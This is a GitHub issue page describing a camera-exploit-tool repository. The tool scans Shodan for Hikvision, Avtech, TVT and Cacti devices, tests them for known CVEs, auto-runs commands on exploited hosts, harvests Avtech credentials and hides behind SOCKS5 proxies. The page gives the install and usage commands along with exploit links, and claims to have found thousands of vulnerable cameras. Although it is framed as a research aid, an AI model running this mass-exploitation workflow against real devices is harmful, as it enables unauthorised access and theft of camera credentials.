-
-
Notifications
You must be signed in to change notification settings - Fork 28
Closed
Labels
Description
[homepage]
https://github.com/TasosY2K/camera-exploit-tool
[/homepage]
[tags]
camera, exploitation, scanner
[/tags]
[short_descr]
Automated exploit scanner for cameras on the internet.
[/short_descr]
[long_descr]
Internet Camera Exploitation Tool
This is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.io
I was able to discover thousands of vulnerable cameras using it



Vendors Affected
[+] Hikvision
[+] Avtech
[+] TVT
[+] Cacti
more to come...
Features
- Fetching of hosts from shodan.io
- Check for vulnerable cameras
- Automatically run commands on exploited devices (Only Hikvision for now)
- Automatically grab camera credentials (Only for Avtech)
- Multi-threading for faster scanning
- Usage of Socks5 proxies for anonymity
- Storing results in Sqlite3 database
- Logging all actions in log files
Prerequisites
To use this tool you need to have the following:
- Shodan API key (Membership required for more than 1 page)
- Socks5 authenticated proxies
Installation
git clone https://github.com/TasosY2K/camera-exploit-tool
pip install -r requirements.txt
python3 scanner.py --helpUsage
Collect hosts in database
# Collect Hikvision hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Hikvision IP Camera"' --pages 1
# Collect Avtech hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'linux upnp avtech' --pages 1
# Collect TVT hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Cross Web Server"' --pages 1
# Collect Cacti hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'Login to Cacti' --pages 1Check hosts for exploit
python3 scanner.py --check --proxy-file proxies.txt --threads 20Automatically run command on exploited hosts
python3 scanner.py --autopwn --proxy-file proxies.txt --payload "id"Exploits Used
https://www.exploit-db.com/exploits/40500
2021-36260 https://www.exploit-db.com/exploits/50441
https://github.com/k1p0d/h264_dvr_rce
CVE-2022-46169 https://github.com/sAsPeCt488/CVE-2022-46169
[/long_descr]
[/image]
Reactions are currently unavailable
